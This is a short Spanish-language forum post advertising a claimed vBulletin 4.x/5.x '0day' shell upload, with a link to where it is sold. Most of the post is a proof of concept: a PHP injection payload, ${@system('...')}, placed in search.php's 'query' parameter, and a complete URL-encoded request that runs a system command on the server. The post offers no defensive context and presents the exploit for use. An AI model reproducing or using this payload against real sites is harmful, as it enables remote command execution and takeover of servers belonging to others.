vBulletin v4.x.x and 5.х.x Shell Upload (0day)
Publicado: 21 Abr 2014, 01:54
link de la venta: [Enlace externo eliminado para invitados]
EL POC:
# "query" param
# php code to inject : ${@system('put command here')}
EL POC:
Código: Seleccionar todo
search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query=%24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthreadid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&titleonly=0&userid=0
# php code to inject : ${@system('put command here')}